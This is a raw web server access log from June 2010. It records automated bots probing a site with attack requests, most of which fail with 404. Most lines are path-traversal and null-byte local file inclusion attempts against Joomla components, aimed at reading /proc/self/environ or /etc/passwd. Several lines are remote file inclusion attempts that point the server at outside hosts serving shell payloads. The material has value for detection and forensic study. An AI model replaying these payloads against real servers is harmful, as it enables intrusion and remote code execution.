211.19.31.123 - - [02/Jun/2010:07:28:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:28:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:28:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:28:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:28:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:28:20 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [02/Jun/2010:07:28:22 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
64.22.67.37 - - [02/Jun/2010:07:31:16 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:31:16 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:31:16 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.121.217.207 - - [02/Jun/2010:07:31:24 -0500] "GET /logs/access_log.1274832000//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:07:31:24 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:07:31:24 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
64.22.67.37 - - [02/Jun/2010:07:32:05 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:32:05 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:32:05 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.204.230 - - [02/Jun/2010:07:32:58 -0500] "GET /logs/access_log.1245715200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.0.254.139 - - [02/Jun/2010:07:33:53 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:07:33:53 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:07:33:56 -0500] "GET /logs/access_log.1271548800/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:07:34:05 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:07:34:05 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:07:34:05 -0500] "GET /logs/access_log.1271548800/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
38.101.148.126 - - [02/Jun/2010:07:34:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:07:34:46 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
174.121.217.207 - - [02/Jun/2010:07:35:00 -0500] "GET /logs/access_log.1274832000//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:07:35:01 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:07:35:01 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:35:35 -0500] "GET /logs/access_log.1274832000/*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:35:35 -0500] "GET /*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:35:35 -0500] "GET /logs/*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
87.250.255.243 - - [02/Jun/2010:07:36:30 -0500] "GET /costume/thmb7.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.19.31.123 - - [02/Jun/2010:07:36:50 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.121.217.207 - - [02/Jun/2010:07:37:00 -0500] "GET /logs/access_log.1274572800//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
211.19.31.123 - - [02/Jun/2010:07:37:07 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.121.217.207 - - [02/Jun/2010:07:38:06 -0500] "GET /logs/access_log.1273363200//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
58.125.181.214 - - [02/Jun/2010:07:39:26 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
58.125.181.214 - - [02/Jun/2010:07:39:26 -0500] "GET /logs/access_log.1271548800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
58.125.181.214 - - [02/Jun/2010:07:39:26 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.122.52.80 - - [02/Jun/2010:07:41:02 -0500] "GET //header.php?DOC_ROOT=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:41:02 -0500] "GET /logs//header.php?DOC_ROOT=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
174.121.217.207 - - [02/Jun/2010:07:42:24 -0500] "GET /logs/access_log.1273363200//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:43:27 -0500] "GET /logs/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:43:27 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.810"
64.22.67.37 - - [02/Jun/2010:07:45:22 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:45:22 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:45:22 -0500] "GET /logs/access_log.1272412800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:45:22 -0500] "GET /logs/access_log.1271462400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.200.142.93 - - [02/Jun/2010:07:45:45 -0500] "GET /logs/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:07:45:46 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
173.201.187.126 - - [02/Jun/2010:07:46:08 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:46:08 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:46:23 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:46:23 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:46:35 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.200.142.93 - - [02/Jun/2010:07:46:38 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:07:46:40 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:07:46:40 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.823"
173.201.187.126 - - [02/Jun/2010:07:46:48 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:47:18 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:47:18 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:07:47:18 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
211.132.187.170 - - [02/Jun/2010:07:47:29 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:07:47:33 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
173.201.187.126 - - [02/Jun/2010:07:47:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:47:58 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:47:58 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:48:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:48:15 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:48:15 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
38.101.148.126 - - [02/Jun/2010:07:48:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:07:48:53 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
208.113.148.15 - - [02/Jun/2010:07:49:02 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:07:49:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:07:49:02 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
207.46.199.38 - - [02/Jun/2010:07:49:06 -0500] "GET /logs/?N=A HTTP/1.1" 200 7924 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.167.25 - - [02/Jun/2010:07:49:15 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.167.25 - - [02/Jun/2010:07:49:15 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.167.25 - - [02/Jun/2010:07:49:15 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.167.25 - - [02/Jun/2010:07:49:20 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.167.25 - - [02/Jun/2010:07:49:20 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.167.25 - - [02/Jun/2010:07:49:20 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.200.142.93 - - [02/Jun/2010:07:51:08 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
204.188.235.66 - - [02/Jun/2010:07:51:22 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:51:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:51:49 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:51:49 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:52:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:52:15 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:52:15 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.251.10.117 - - [02/Jun/2010:07:52:16 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:07:52:16 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:07:52:16 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:07:52:16 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
222.122.52.80 - - [02/Jun/2010:07:52:22 -0500] "GET /es_desp.php?files_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:52:22 -0500] "GET /logs/es_desp.php?files_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
173.201.187.126 - - [02/Jun/2010:07:52:41 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:07:52:59 -0500] "GET /logs/index.php?design=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:07:52:59 -0500] "GET /index.php?design=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:07:52:59 -0500] "GET /logs/index.php?design=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:07:52:59 -0500] "GET /index.php?design=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:07:53:32 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
91.121.180.195 - - [02/Jun/2010:07:54:30 -0500] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [02/Jun/2010:07:54:30 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.22.67.37 - - [02/Jun/2010:07:54:31 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:54:31 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:54:31 -0500] "GET /logs/access_log.1272412800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:54:31 -0500] "GET /logs/access_log.1271462400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
208.71.174.218 - - [02/Jun/2010:07:54:58 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:07:54:58 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
66.223.110.205 - - [02/Jun/2010:07:55:10 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:07:55:10 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [02/Jun/2010:07:55:16 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:07:55:16 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:07:55:45 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:07:55:46 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.11.114 - - [02/Jun/2010:07:55:53 -0500] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:07:55:54 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.233.172.42 - - [02/Jun/2010:07:55:55 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:07:55:55 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [02/Jun/2010:07:56:01 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:07:56:01 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:07:56:03 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:07:56:03 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
84.53.217.109 - - [02/Jun/2010:07:56:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:07:56:03 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:07:56:03 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
80.233.172.42 - - [02/Jun/2010:07:56:09 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:07:56:09 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:07:56:40 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:07:56:40 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [02/Jun/2010:07:57:12 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:07:57:12 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
